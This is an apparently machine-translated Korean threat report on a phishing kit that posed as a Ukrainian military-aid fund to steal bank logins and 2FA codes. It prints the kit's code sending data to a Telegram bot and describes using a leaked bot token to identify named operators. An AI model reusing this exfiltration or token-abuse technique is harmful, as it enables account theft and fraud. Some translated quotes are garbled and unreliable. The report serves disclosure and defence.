뉴스로 돌아가기
현재 진행 중인 위협 — 조사 보고서

군사 원조 피싱 네트워크 적발: 5개 은행이 표적이 되었으며, 범인이 특정되었다

PhishDestroy의 자동화 Pipeline은 우크라이나 군사 지원 재단을 사칭한 피싱 작전을 도메인 등록부터 운영자 신원 파악에 이르기까지 단 몇 분 만에 면밀히 분석했습니다.

2026년 3월 25일 PhishDestroy 연구 읽는 데 12분
스크린샷 1 — 조사 개요: 우크라이나 군 참전 용사들을 표적으로 삼은 dopomogvoina[.]sbs 피싱 네트워크.
5
표적이 된 은행들
3
운영자 확인됨
6
Unmask에 대한 API 호출
2
병행 피싱 프로젝트
<30
전체 분석까지 남은 시간
후원사 공개(클릭하면 펼침)
이번 조사의 공식 후원사를 소개합니다
🏆 NiceNIC International Group Co., Limited 🏆
가장 권위 있는 그 등록기관이 Netcraft와 협력하고 있습니다 (시스템을 속여서) · 의 공식 도메인 공급업체 크라켄 마약 거래소 · 대량 구매 할인 제공업체 · ~의 열성적인 지지자 "전형적인 사기꾼" VK 커뮤니티 — 하지만 아직 익명성 강좌를 구매하지는 않았다
⭐ 1.8
트러스트파일럿
평점
$200
.ru 가격
120₽ 실화
0
학대 신고
조치됨
15,000%
도메인
마크업
  • 자신을 “중국인”(홍콩)이라고 주장하고 있지만, 이 작품의 제작자는 고르로브카, 도네츠크 인민공화국. 중국의 브랜드 로고는 순전히 장식적인 용도일 뿐입니다 — 이용약관처럼 말이죠
  • 유지합니다 러시아어 지원 VKontakte와 Telegram을 통해 판매하며, .ru reg.ru에서 청구하는 금액은 200달러입니다. 120₽ (~$1.30)
  • Trustpilot의 부정적 리뷰에서 언급된 마약 거래소 도메인 신비롭게 사라졌다. 우연일까? 절대 아니다.
  • ~의 열성 구독자 "전형적인 사기꾼" (전형적인 사기꾼) VK 커뮤니티 — 등록 기관이 사기 그룹을 팔로우하고 있다면, 그 대상 고객층이 누군지 알 수 있습니다
  • 협력하는 넷크래프트 피싱, 도박, 마약 관련 도메인을 위한 인프라를 유지하면서, 상장 폐지를 면할 수 있을 정도의 수준만 유지한다

한편, “전형적인 사기꾼”에서는:

원문 (러시아어)
번역됨 (영어)
후원자님께 드리는 약속: “Типичный Мошенник”의 이 게시물이 현실이 된다면 — 우리가 알고 있는 바에 따르면, 그것은 단지 시간 문제일 뿐입니다. ~할 때, 아니라 만약 — 저희 팀 전원이 VKontakte에 가입하고 해당 커뮤니티를 팔로우할 예정입니다. 이를 저희의 기립 박수로 받아주시기 바랍니다. 👏

* 이 글은 풍자입니다. NiceNIC은 이번 조사를 후원하지 않았습니다. 다만, 당사의 악용 신고에 대해 5일 이상 아무런 조치를 취하지 않음으로써 이번 조사가 불가피하게 되었습니다. 위에 언급된 모든 내용은 공개된 정보와 당사의 운영 경험을 바탕으로 한 것입니다. NiceNIC에 대한 저희의 전체 폭로 기사 읽어보기 →

PhishDestroy가 발견한 것

2026년 3월 20일, PhishDestroy의 자동 위협 탐지 Pipeline이 다음을 탐지했습니다. dopomogvoina[.]sbs — 갓 등록된 도메인으로, 다음을 사칭하는 피싱 사이트를 호스팅하고 있는 "수호자의 방패" (Shield of the Defender)는 허위로 만들어진 우크라이나 군사 지원 재단입니다. 이 사이트는 우크라이나 참전 용사, 전투 중 부상자, 전사자 유가족을 대상으로 정부 재정 지원을 약속하는 한편, 우크라이나 5대 은행의 계좌 접속 정보를 탈취하고 있습니다.

다음은 당사의 자동화된 분석을 통해 밝혀진 모든 내용, 즉 사회공학적 기법, 기술적 인프라, 실시간 운영자 제어 시스템, 그리고 이를 운영하는 사람들의 신원에 대한 상세한 분석 결과입니다.

영향 평가
이 사이트는 특히 가장 취약한 계층, 즉 PTSD를 앓고 있는 참전 용사들, 정부 지원을 요청하는 전사 군인의 유가족, 그리고 복잡한 행정 절차를 헤쳐 나가야 하는 부상 군인들을 대상으로 합니다. 인증 정보가 하나만 유출되어도 단 몇 분 만에 계정이 완전히 탈취될 수 있습니다.

제1장: 미끼 — 가짜 군사 원조 재단

도메인 dopomogvoina[.]sbs 2026년 3월 20일에 다음을 통해 등록되었습니다. NiceNIC 인터내셔널 그룹 유한공사, 악용 사례에 대한 대응이 느리거나 아예 이루어지지 않는다는 사실이 잘 기록된 이력서를 가진 등록기관입니다. 이 .sbs TLD(Side-By-Side)는 일회용 피싱 인프라 구축에 자주 악용되는 저비용 gTLD입니다.

이 사이트는 정부와 밀접한 관련이 있는 전문적인 지원 포털인 것처럼 보입니다. 헤더에는 우크라이나 국기가 가득 차 있고, 군사적 이미지가 신뢰감을 더하며, 페이지 내용은 정식 정부 프로그램을 연상시키는 관료적인 표현을 사용해 우크라이나어로 세심하게 작성되어 있습니다.

가짜 군사 원조 재단을 보여주는 도포모그보이나 피싱 사이트의 홈페이지
스크린샷 5 — “Щит Захисника”(Shield of the Defender)를 사칭하는 피싱 사이트의 랜딩 페이지.

신뢰도를 높이기 위해 운영자들은 랜딩 페이지의 눈에 잘 띄는 곳에 통계 카운터를 조작해 배치했습니다:

  • 2,847건의 신청 — 이는 이미 수천 명이 지원을 받았음을 시사한다
  • 4,720만 ₴ 배분됨 — UAH에서 규모는 크지만 설득력 있는 인물
  • 19개 프로그램 — 포괄적이고 여러 프로그램을 아우르는 운영을 시사한다

이 수치들은 전적으로 조작된 것으로, 백엔드와의 연결 없이 페이지 소스 코드에 직접 하드코딩되어 있습니다. 이 수치들은 단 하나의 목적, 즉 피해자의 망설임을 떨쳐버리게 하는 ‘사회적 증명’ 역할을 합니다.

제2장: 함정 — 5개의 은행, 하나의 목표

“Подати заявку”(신청 제출)을 클릭하면 피해자에게 은행 선택 화면이 표시됩니다. 우크라이나 최대 규모의 소매 은행 5곳이 선택지로 나타나며, 각 은행은 공식 브랜드명과 로고를 갖추고 있습니다. 바로 이 시점에서 사회공학 공격은 감정적 조작에서 기술적 절도로 전환됩니다.

우크라이나 은행 5곳이 표시된 은행 선택 화면
스크린샷 6 — 은행 선택 화면. 각 옵션을 선택하면 맞춤형 인증 정보 탈취 절차가 시작됩니다.

해당 사이트의 자바스크립트 번들을 분석한 결과, 각 은행마다 독특한 다단계 인증 정보 수집 절차, 해당 은행의 실제 인증 절차에 맞춰 조정된:

프라이빗뱅크

로그인비밀번호PINSMS

모노뱅크

로그인PINSMS이메일

오샤드뱅크

로그인확인SMS

PUMB

로그인SMS

우크르시브은행

로그인PINSMS

모든 은행에 대한 공격 흐름은 다음과 같은 동일한 패턴을 따릅니다:

가짜 기부 페이지
은행 선택
로그인 복제
2단계 인증 가로채기
계정 탈취
가짜 PrivatBank 로그인 페이지
스크린샷 7 — 복제된 PrivatBank 로그인 화면.
가짜 PUMB 로그인 페이지
스크린샷 9 — 복제된 PUMB 로그인 화면.
가짜 구호 페이지에서 계정 탈취에 이르는 피싱 단계를 보여주는 공격 흐름도
스크린샷 10 — 전체 공격 흐름: 가짜 군사 원조 페이지에서 시작해 은행 선택, 인증 정보 탈취, 계정 탈취에 이르기까지.

기술 스택: React SPA 다음 경로를 통해 제공되는 프론트엔드 Cloudflare CDN, 그리고 Express.js 백엔드에서 인증 정보 유출을 처리합니다. React 아키텍처를 통해 정식 은행 인터페이스와 구별할 수 없을 정도로 매끄러운 다단계 양식을 구현할 수 있습니다.

제3절: 실시간 운영자 제어

이것은 정적 데이터베이스를 사용하는 단순한 인증 정보 수집 도구가 아닙니다. 이 피싱 키트에는 실시간 WebSocket 제어판 이를 통해 운영자가 각 피해자의 세션을 실시간으로 조작할 수 있게 해줍니다.

다음 주소의 WebSocket 엔드포인트: wss://dopomogvoina[.]sbs/ws 다음 메시지 유형을 지원합니다:

register          — New victim session created
update_user_data  — Stolen credentials transmitted to operator
next_step         — Operator advances victim to next theft stage
create_application — Victim starts "aid application"
answer_question   — Operator sends custom prompt to victim

이러한 실시간 제어 기능을 통해 작업자는 다음과 같은 작업을 수행할 수 있습니다:

  • 대기 상태 강제 적용 — 피해자의 실제 은행 계좌에 로그인하는 동안 “신청 처리 중...”이라는 메시지를 표시한다
  • 특정 단계로 이동 — 첫 번째 SMS 코드의 유효 기간이 만료된 경우, 코드를 다시 요청하세요
  • 가짜 오류 메시지 표시 — “코드가 유효하지 않습니다. 다시 입력해 주세요”라는 메시지를 이용해 여러 개의 2단계 인증 토큰을 탈취
  • 사용자 지정 질문하기 — 세션 도중에 생년월일, 카드 번호 또는 기타 추가 정보를 요청하는 경우
이것이 왜 위험한가
실시간 운영자 제어는 시간 기반 2단계 인증(2FA) 보호 기능을 무력화합니다. 운영자는 SMS 인증 코드를 가로채어 유효 기간(일반적으로 30~120초) 내에 이를 사용하는 동안, 피해자는 가짜 “처리 중” 애니메이션을 멍하니 바라보게 됩니다.
가짜 은행 로그인 화면의 전화번호 입력 양식
스크린샷 8 — 인증 정보 도용을 유도하기 위해 사용된 전화번호 입력 양식.
WebSocket 기반 운영자 제어판
스크린샷 11 — 피해자의 세션을 제어하기 위한 운영자의 실시간 봇 패널.

세션당 유출된 데이터의 전체 범위: phone, password, PIN, SMS code, card number, date of birth, 그리고 email.

4장: Cloudflare의 이면 — 두 개의 프로젝트, 하나의 서버

Cloudflare 프록시 기능은 원본 서버를 숨기지만, PhishDestroy의 인프라 분석 Pipeline을 통해 실제 원본 IP를 파악했습니다: 45.131.214[.]148, 다음 사이트에서 호스팅됨: RapidSeedbox / LeaseWeb 네덜란드에서.

중요한 세부 사항: dopomogvoina[.]sbs ~을 통해 중계됩니다 Cloudflare, 발신 IP를 숨기면서. 하지만 우리 시스템은 또한 hlpforvpeople[.]sbs — 동일한 NiceNIC 등록기관을 통해 등록되었으며 패턴이 일치하는 관련 도메인입니다. 해당 도메인은 Cloudflare 뒤에 있지 않음, 원본 IP 주소를 직접 노출시키면서: 45.131.214[.]148.

이 IP에 — 없이 직접 연결하려면 Host 헤더 — 예상치 못한 사실을 드러냈는데, 바로 a 완전히 다른 피싱 사이트. 우크라이나에 대한 군사 원조 대신, 기본 vhost가 제공한 "헬스케어 ID", 인도네시아 건강보험을 노린 피싱 사기 사건. 서버는 같지만, 피해자는 완전히 다르고, 국가도 완전히 다릅니다.

같은 서버, 같은 운영자, 다른 피해자들
  • 프로젝트 1: 우크라이나 군사 원조 → 참전용사들의 은행 계정 정보를 도용
  • 프로젝트 2: 인도네시아 건강보험 → 시민들의 의료 정보를 도용한다
  • 동일한 Express.js 스택, 동일한 WebSocket 실시간 제어판
  • 동일한 BT-Panel(宝塔) 서버 관리 인터페이스
  • 두 번째 프로젝트의 C2 도메인: rezervtemka[.]cc — PhishDestroy의 위협 데이터베이스에서 확인된 알려진 피싱 패널
  • 러시아어 댓글 인도네시아 프로젝트의 소스 코드에서 확인된 바와 같이, 동일한 CIS 기반 개발자들이
동일한 서버에서 운영 중인 두 가지 피싱 프로젝트 — 우크라이나 군사 원조 및 인도네시아 건강 보험
스크린샷 12 — 동일한 오리진 서버를 공유하는 두 건의 병행 피싱 공격: 우크라이나 군사 지원(dopomogvoina) 및 인도네시아 건강 보험(HealthCare ID).

인도네시아 피싱 템플릿은 PhishDestroy의 위협 인텔리전스 데이터베이스에 등록된 알려진 키트. 우리는 동남아시아 전역에서 인도네시아, 태국, 베트남의 금융 기관을 표적으로 삼은, 바로 이 템플릿의 변종들이 배포되는 것을 목격했습니다. 공격자들은 동일한 백엔드 인프라를 재사용하면서 국가별 템플릿만 교체할 뿐입니다.

무차별적인 범죄자들
이것이 바로 현대 피싱 공격의 실상입니다: 운영자들은 누구의 것을 훔치는지는 상관하지 않는다. 군사 원조를 요청하는 우크라이나 참전 용사들, 건강보험에 가입하는 인도네시아 노동자들 — 가장 많은 수익을 창출하는 템플릿에 따라 표적이 바뀝니다. 같은 러시아어권 운영자들이 동일한 서버에서 두 캠페인을 동시에 진행하며, 마치 TV 채널을 돌리듯 여러 국가의 피해자들을 번갈아 노립니다. 오늘은 우크라이나 은행들이 표적입니다. 내일은 이스라엘 은행이 될 수도 있다. 보냐가 이미 2026년 3월에 이에 대해 문의한 바 있다.

5장: 모든 것을 드러낸 config.json

단 하나의 설정 오류가 어떻게 전체 운영을 무너뜨렸는지, 그 과정을 단계별로 살펴보겠습니다.

원본 서버의 두 번째 프로젝트를 확인한 후, PhishDestroy의 JS 분석기 — 당사의 자동화된 자바스크립트 분석 도구 —는 다음 주소의 인도네시아 피싱 사이트 번들을 대상으로 분석했습니다. https://45.131.214[.]148/assets/index-ZMQxHb_h.js. 분석기는 335KB 크기의 자바스크립트 파일에서 모든 API 엔드포인트, 외부 URL 및 구성 경로를 추출했습니다. 분석 결과 중 일부는 다음과 같습니다:

  • 다음 위치에 있는 5개의 API 엔드포인트: rezervtemka[.]cc — 자격 증명 확인용 C2 패널
  • 다음에 대한 WebSocket 연결: wss://rezervtemka[.]cc
  • 피해자 추적을 위한 페이스북 픽셀 연동
  • ~에 대한 언급 /config.json — Telegram 봇 구성을 위해 실행 시점에 불러옴

이 단서를 바탕으로, 우리는 다음을 가져왔습니다. /config.json 원본 IP에서. 이 파일은 인증 절차 없이도 접근할 수 있었으며, 웹 루트 디렉터리에 위치해 있어 누구나 읽을 수 있었습니다:

async function loadConfig() {
  const response = await fetch('/config.json');
  // ...
}
async function sendNotification() {
  const cfg = await loadConfig();
  await fetch(`https://api.telegram.org/bot${cfg.bot_token}/sendMessage`, {
    method: 'POST',
    body: JSON.stringify({ chat_id: cfg.chat_id, text: message })
  });
}

/config.json 해당 파일은 원본 IP에서 직접 접근할 수 있었는데 — 인증도 없고, 접근 제어 기능도 없으며, 웹 루트 디렉터리에 그냥 일반 JSON 파일이 하나 놓여 있을 뿐입니다.:

{
  "bot_token": "8724623843:AAFXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX",
  "chat_id": "-100XXXXXXXXXX"
}

Telegram 봇 토큰은 사용자 이름이자 비밀번호 역할을 합니다. 이 토큰을 가진 사람은 누구나 해당 봇으로 API 호출을 수행할 수 있습니다. 운영자들은 자신들의 토큰을 누구나 접근할 수 있는 파일에 남겨두었습니다. API 호출을 여섯 번 거친 끝에, 우리는 모든 것을 확보했습니다:

getMe — 봇 ID: "MonettiCRM" (@MonettiCRM_bot)
getChat(chat_id) — 그룹 이름: “Idr card”, 초대 링크 활성화됨
getChatAdministrators — 그룹 생성자를 포함한 관리자 3명
getChat(creator_id) — 제작자: @monettiescobar, Telegram 프리미엄, 비즈니스 프로필, 시간대 UTC+3
getChat(admin2_id) — 두 번째 관리자: 프로필 정보가 없으며, 보조 계정으로 의심됨
getChatMemberCount — 운영자 그룹의 총 구성원 수는 5명입니다.
config.json에서 운영자 신원 완전 파악에 이르는 6건의 Telegram API 호출을 보여주는 OSINT 체인
스크린샷 13 — 완전한 OSINT 체인: 노출된 config.json에서 6번의 API 호출을 통해 운영자 신원을 완전히 파악하기까지.

단 하나의 잘못 구성된 파일에서 시작해, 단 6번의 HTTP 요청만으로 운영자를 완전히 파악할 수 있었습니다. 악용도, 무단 접근도 없었습니다. 단지 운영자들이 직접 노출해 둔 토큰을 사용한 표준 Telegram 봇 API 호출만으로도 가능했습니다.

제6장: 운영자

범죄적 창의성에 관한 고찰

다음은 정말 형편없는 별명 선택의 전형적인 사례입니다. 여기에는 모네티 에스코바르 — 역사상 가장 유명한 마약왕의 이름을 따서 지은 것만큼 ‘눈에 띄지 않는’ 이미지를 잘 보여주는 것도 없으니까요. 그리고 또 하나, 보냐, 일명 PapaZakonVor (직역하면 “법적으로 정해진 아빠-도둑” — 러시아 범죄 조직의 계급 구조를 빗대어 만든 표현), 보아, 그리고 bubullikk. 그리고 마지막으로 데보이스, 닉네임이 @devosus 어쩐지 “dev ops us”처럼 보이는데, 사용자 이름에 자신의 직함을 넣은 개발자일 가능성이 높습니다. 이들은 자동화된 위협 인텔리전스를 속일 수 있다고 생각했던 사람들입니다. 스포일러: 결국 실패했습니다.

Telegram 운영자 그룹 ‘Idr card’, 봇 토큰을 통해 노출
스크린샷 14 — 유출된 봇 토큰을 통해 드러난 Telegram 운영자 그룹 “Idr card”.
MONETTI ESCOBAR Telegram 프로필 사진
소유자 / 제작자
모네티 에스코바르
@monettiescobar
Telegram ID: 8135223234
Telegram 프리미엄, 비즈니스 프로필
시간대: UTC+3 (CIS 지역)
공개 메시지 10건 — 엄격한 OPSEC
TraFFeeQ 채팅메두사 구글 애즈딥페이크 채널
Bonya Telegram 프로필 사진
운영 담당자 / 교통
보냐
@BoaCC159
Telegram ID: 6242202706
일명: PapaZakonVor, Boa, bubullikk
12개 그룹에 걸쳐 총 261개의 메시지
DC2 — 암스테르담, 네덜란드
CryptoGrabSTYX 마켓레이븐 CCEMPIRE 채팅피닉스 솔루션
개발자 / 프로그래머
데보이스
@devosus
Telegram ID: 8213612730
피싱 키트 개발자 — 운영자들은 그를 ‘코더’라고 부른다
보안 침해 사실이 발견되었을 때 “방어책을 마련하라”는 요청을 받았다
설계상 공공 공간에 미치는 영향을 최소화
손잡이 @devosus ≈ "dev ops us" — 사용자 이름으로 직책 사용
키트 개발자인프라보안

모네티 에스코바르 — 보스

MONETTI는 엄격한 운영 보안을 유지하고 있으며 — 오직 공개 메시지 10개 두 그룹에 걸쳐. 하지만 이 그룹들이 그 상황을 잘 보여줍니다: TraFFeeQ 채팅 (사기 목적의 트래픽 차익 거래), 메두사 구글 애즈 (블랙햇 구글 광고), 그리고 딥페이크 채널. 그의 Telegram 비즈니스 프로필에는 “Есть предложение” ("제안이 하나 있습니다") — 서비스를 공개적으로 홍보하고 있다. UTC+3 시간대(모스크바/민스크/키예프와 동일)와 연중무휴 24시간 운영은 이 업체가 CIS 지역을 기반으로 24시간 내내 운영되고 있음을 보여준다.

보냐 — 부주의한 자

MONETTI의 신중한 OPSEC과는 달리, Bonya(이전 별칭: PapaZakonVor — 대략 “DaddyThiefByLaw” —는 방대한 디지털 흔적을 남겼는데 — 12개의 지하 단체에 걸쳐 총 261건의 메시지. 그의 채팅 기록은 마치 범죄 이력서처럼 읽힌다:

보냐의 직접적인 말 (러시아어에서 번역)
  • "2.0 전류용 피시""그저 [은행 보안] 2.0을 노린 피싱일 뿐" — 최신 은행 보안 시스템과의 피싱 키트 호환성에 대해 논의
  • "좋은 드롭은 찾기 힘들다""유능한 자금 운반책은 찾기 어렵다" — 현금 인출을 도울 공범 모집
  • "문화센터로 와서 나랑 같이 일하자""제 콜센터에서 일해 보세요" — 운영 인력 모집
  • "여기 이스라엘 은행과 거래해 본 분 계신가요?""여기 이스라엘 은행과 일해 본 분 계신가요?" — 새로운 대상 지역으로 확대 (2026년 3월)
  • "핀카 관련 로고는 딱히 눈에 띄지 않네요""금융 관련 로그가 별로 보이지 않네요" — 도난당한 인증 정보의 품질에 대해 논의하며
  • "프록시 1개당 1~2개의 뱅크가 있다면""단 1~2개 은행에 대한 대리인 1명" — 은행 사기 방지를 위한 운영 보안에 대해 논의하며
  • "그녀의 카드가 ATM에 끼어버렸다""그녀의 카드가 ATM에 빨려 들어갔어요" — 한 돈세탁책이 ATM 기기가 카드를 삼켰다고 속여 그들로부터 ₴60,000을 훔쳐갔다. 범죄자조차도 자신의 공범에게 사기를 당하기도 한다.

그가 속한 단체들을 살펴보면 전체적인 그림이 드러납니다: CryptoGrab (암호화폐 지갑 탈취범들), STYX 마켓 (도난 데이터의 암시장), Raven CC 검사기 (신용카드 유효성 검사 도구), EMPIRE 채팅 그리고 피닉스 솔루션 (사기 공모). 이 사람은 일회성 범인이 아니라, 사이버 범죄 생태계에 깊이 뿌리내린 인물입니다.

Devoys — 개발사

작전의 기술적 중추. 설계상 대외적 노출을 최소화한 시스템이었는데, 조직이 해킹당했을 때 보냐는 명시적으로 그에게 도움을 요청했다: "@devosus, 우리가 완전히 박살 나기 전에 방어 전략을 좀 생각해 봐""@devosus, 우리가 완전히 박살 나기 전에 방어 전략을 좀 생각해 봐." 이 사건에 대한 그의 비꼬는 반응은 — "인터폴에 갈 때" ("보간을 언제 수행해야 하는가") — 이는 이번이 처음 겪는 아슬아슬한 상황이 아니라는 것을 시사한다.

행동 분석: 261건의 메시지 해독

PhishDestroy의 OSINT Pipeline을 통해 수집 및 번역됨 총 261개의 공개 게시물 Bonya가 12개의 Telegram 지하 그룹을 통해 공유한 내용(2024년 6월 ~ 2026년 3월). DeepL API를 통한 기계 번역 후 수동으로 문맥을 수정함. 이 메시지들은 범죄 활동 유형별로 아래에 분류된 완전한 운영 프로필을 보여준다.

메시지 배포 현황: 12개 그룹에 걸쳐 261건의 메시지
  • 💬ONE|채팅 — 91건의 메시지 (사기 공조)
  • 최신 소식/인증 — 37건의 메시지 (신원 확인 사기)
  • 롤렉스 | 일반 채팅방 — 28건의 메시지 (카딩)
  • EMPIRE 채팅 — 24건의 메시지 (암시장)
  • Фб스토르 — 23건의 메시지 (트래픽 차익 거래)
  • FB-DOC — 22건의 메시지 (광고 사기)
  • 피닉스 솔루션 — 17건의 메시지 (은행 사기)
  • CryptoGrab — 메시지 11개 (암호화폐 유출)
  • STYX 마켓 — 메시지 2개 (지하 시장)
  • Raven CC 검사기 — 메시지 2개 (카드 확인)

은행 사기 및 피싱

💬ONE|채팅2025년 3월
"여기 피쉬는 2.0밖에 없네요"
그리고 여기 2.0 전류용 피시가 있네요
최신 은행 보안 프로토콜과 피싱 키트의 호환성에 대한 논의
💬ONE|채팅2025년 3월
"야, 여기 피쉬에서는 물건을 파는 게 아니야. 그냥 결제용 피쉬일 뿐이야."
형, 여기서는 피쉬로 아무것도 팔지 않아. 여기선 피쉬로 결제만 가능해.
‘판매 목적의 피싱’과 ‘직접 절도 목적의 피싱’ 구별하기
피닉스 솔루션2026년 3월
"여기 이스라엘의 은행과 함께 일해 본 경험이 있는 분 계신가요?"
혹시 여기 이스라엘 은행과 거래해 본 분들 계신가요?
이스라엘 은행업으로 사업 영역 확대 — 우리 조사 시작 5일 전
롤렉스 | 일반 채팅방2024년 9월
"대리인이 1명이라면, 은행은 1~2곳뿐입니다"
프로xy 1개당 1~2개의 뱅크가 있다면
다중 은행 사기 사건에 대한 운영 보안: 탐지를 피하기 위해 1~2개 은행당 하나의 프록시 사용
롤렉스 | 일반 채팅방2024년 9월
"재무 관련 기록은 별로 보이지 않네요"
핀카 관련 로고는 딱히 눈에 띄지 않네요
암시장에서 거래되는 도난당한 은행 계정 정보의 품질에 대한 불만

자금 세탁 중개자 및 현금 인출

💬ONE|채팅2025년 3월
"좋은 물건이 좀처럼 나오지 않는다"
좋은 드롭을 찾기는 정말 힘들어요
"드롭스" = 훔친 자금을 현금화하는 자금 세탁책. 모집이 어렵다고 불평하고 있다.
💬ONE|채팅2025년 3월
"제 콜센터에서 일해 보세요"
문화센터에 와서 나랑 같이 일하자
사기 전화 센터 운영에 참여할 인력을 적극적으로 모집 중입니다
최신 소식2024년 6월
"우리에게서 6만 달러가 도난당했다"
우리한테서 60k를 훔쳐갔어요
한 돈세탁 조력자가 사기범들로부터 ₴60,000을 훔쳐갔다. 아이러니한 정의다.
최신 소식2024년 6월
"도대체 ATM이 어떻게 카드를 삼켜버릴 수 있는 거야?"
도대체 ATM이 어떻게 카드를 삼켜버릴 수 있는 거야?
이 중개인은 ATM이 훔친 돈을 챙기기 위해 카드를 “삼켜버렸다”고 주장했다. 사기꾼들이 또 다른 사기꾼들을 속이는 셈이다.
최신 소식2024년 6월
"그녀가 그 돈을 우리에게 이체해 줬지만, 우리는 그 돈을 옮길 수 있는 주요 전달 경로가 없었어요"
그녀가 그 돈을 우리에게 넘겼는데, 당시 우리에게는 돈을 이체할 수 있는 주요 입금 수단이 없었습니다.
현금 인출 경로 설명: 피해자 → 중개 계좌 → 주된 자금 세탁책

트래픽 사기 및 광고 남용

EMPIRE 채팅2026년 3월
"구글은 안 쓰고, 페이스북만 써요"
글쎄요, 전 구글은 안 쓰고 페이스북만 쓰거든요
페이스북 광고 사기를 전문으로 하며, 피싱 페이지로 트래픽을 유도합니다.
FB-DOC2026년 2월
"저도 보증인이 없다면 광고비의 %만큼은 투자하지 않을 겁니다"
저도 보증인이 없다면 지출액의 일정 비율을 입금하지는 않을 것 같아요
사기성 페이스북 광고 캠페인 운영에 대한 결제 조건 협상
CryptoGrab2025년 1월
"미국 시장을 공략하기 위해 페이스북에서 AML을 시도해 봤는데, 온라인에서 제대로 된 설정 방법을 찾을 수가 없었어요."
페이스북에서 AML에 대해 찾아봤는데, 인터넷에서도 미국 관련해서 제대로 된 정보나 오래된 자료조차 찾을 수 없었어요.
페이스북 광고를 이용해 미국인을 대상으로 한 자금세탁 방지 사기를 시도
심리 프로필: 보냐

261개의 메시지로 구성된 코퍼스를 분석한 결과, 중급 사이버 범죄자 다양한 범죄 수법을 활용합니다: 은행 피싱, 자금 세탁 중개 네트워크, 페이스북 광고 사기, 암호화폐 탈취, 신용카드 정보 도용 등. 주요 특징:

  • 업무상 부주의 — 단일 계정으로 공개 그룹에 걸쳐 261건의 메시지를 게시했다. 여러 개의 별명(PapaZakonVor → Boa → Bonya)을 사용한 점으로 미루어 볼 때, OPSEC에 대한 인식은 있었으나 이를 실천하지는 못한 것으로 보인다.
  • 채용 마인드셋 — 사람들에게 “내 콜센터에서 일해 달라”고 적극적으로 권유하며, 운영 노하우를 현금으로 팔고 있다
  • 피해자에 대한 무관심 — 우크라이나, 유럽, 이스라엘, 미국의 표적들을 똑같이 냉정하게 다룬다. 지리적 위치는 사기 방정식에서 그저 하나의 변수에 불과하다
  • 신뢰 문제 — 6만 페소를 노리고 자신의 자금 세탁책에게 배신당했다. 아이러니하게도 이는 그가 피해자들에게 심어주는 불신을 그대로 반영한다.
  • 확장 주도형 — 최근인 2026년 3월에도 새로운 은행 시장(이스라엘)을 적극적으로 모색하고 있는 것으로 보아, 우크라이나를 대상으로 한 피싱 공격은 동시에 진행 중인 수많은 작전 중 하나에 불과함을 시사한다
Bonya: 전체 메시지 기록 (12개 그룹에 걸친 253개의 메시지)
Bonya (@BoaCC159) — 전체 번역된 메시지 내역
-- Phoenix Solution (게시물 16개) --
B
보냐2026-03-17 14:22
여기 이스라엘의 은행과 일해 본 경험이 있는 분 계신가요?혹시 여기 이스라엘 은행과 거래해 본 분들 계신가요?
B
보냐2026-03-17 14:22
조용히 일하고 있기도 하고.우리도 조용히 일하고 있어요
B
보냐2026-03-17 14:17
잘 지내세요?잘 지내?
B
보냐2026-03-17 14:17
여러분, 안녕하세요여러분, 안녕하세요
B
보냐2026-03-15 19:02
음, 이제 거의 다 고쳐졌네요.뭐, 어쨌든 이제 다 잘 정리됐네요
B
보냐2026-03-15 19:02
뭐, 좀 귀찮긴 하네요뭐, 좀 골치 아픈 일이 생겼네
B
보냐2026-03-15 19:01
그래, 나도 조용히 일을 많이 해왔는데, 완전 엉망이네.그래, 조용히 일하다 보니 정말 지긋지긋해졌어
B
보냐2026-03-15 19:00
휴일은 어떻게 보내셨나요?주말은 어떻게 보냈나요?
B
보냐2026-03-15 19:00
여러분 모두.모두에게
B
보냐2026-03-14 14:29
이제 모두가 마릭이라는 사실을 알고 있으니, 그는 더 이상 익명의 인물이 아닙니다.이젠 더 이상 익명이라고 할 수도 없지, 다들 마릭이 누군지 다 알고 있으니까
B
보냐2026-03-14 14:24
재탄생다시 태어났다
B
보냐2026-03-14 14:24
아하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하하아하하하하하하하하하
B
보냐2026-03-14 14:23
채팅방이 사라진 걸 보고 속상했어요.채팅창이 사라진 걸 보고 정말 속상했어요
B
보냐2026-03-14 14:22
널 절대 못 찾을 줄 알았어.정말 여러분을 못 찾을 줄 알았어요
B
보냐2026-03-14 14:22
KooКу
B
보냐2026-03-14 14:22
씨발에바
-- 👨‍⚕️ FB-DOC — 트래픽 중재 관련 채팅 (21개 메시지) --
B
보냐2026-03-15 07:23
@fbdoc21@fbdoc21
B
보냐2026-03-15 07:20
자지의 끝으로 이마를 쿵 하고 쳐라.이마에 자지로 스팸 좀 뿌려줘
B
보냐2026-03-06 15:18
2.5😂 화면에서 5개 정도.스크린샷에 2.5가 딱 5개 있네 😂
B
보냐2026-02-19 17:05
여러분 모두에게.여러분 모두
B
보냐2026-02-19 17:04
네가 거래를 시작하면, 난 웃을 거야.거래를 시작하면 내가 웃어 죽을 거야
B
보냐2026-02-19 17:04
대륙적인?콘티넨탈?
B
보냐2026-02-19 17:04
자, 저기 그녀가 있네요.자, 보시다시피 그녀가 동의했네요
B
보냐2026-02-19 17:01
그러니 보증인에 대해 물어볼 때는 항상 신원 조사를 하세요.보증에 대해 문의하실 때는 항상 이 메일을 첨부해 주세요.
B
보냐2026-02-19 17:00
그는 보증인에 대해 물어보더니 곧바로 사라져 버렸다.보증인에 대해 물어보더니 바로 사라졌다
B
보냐2026-02-19 17:00
아, 카리나아, 카리나
B
보냐2026-02-19 16:59
그럼 보증인을 구하려고 하는 건가요?그럼, 보증인 역할을 하러 가는 거야?
B
보냐2026-02-19 16:57
저도 보증인이 없다면 지출액의 일정 비율을 지원해 주지는 않을 겁니다.저도 보증인이 없다면 지출액의 일정 비율을 입금하지는 않을 것 같아요
B
보냐2026-02-19 16:57
나?나?
B
보냐2026-02-19 16:57
글쎄, 그녀는 스크린샷을 올렸는데 넌 나한테 아무것도 안 줬잖아.글쎄, 그녀는 스크린샷을 올렸는데 넌 아무것도 안 올렸잖아
B
보냐2026-02-19 16:56
그녀가 올린 스크린샷을 보세요그녀가 올린 스크린샷 좀 봐
B
보냐2026-02-19 16:55
보증인에 대해서는 언급하지 않았나요?그는 보증인에 대해 쓰지 않았나요?
B
보냐2026-02-19 16:54
너 진짜 괴짜네😂너 미친 거 아냐😂
B
보냐2026-02-19 16:53
보증인을 요청하셨죠.너는 보증인에게 부탁했어?
B
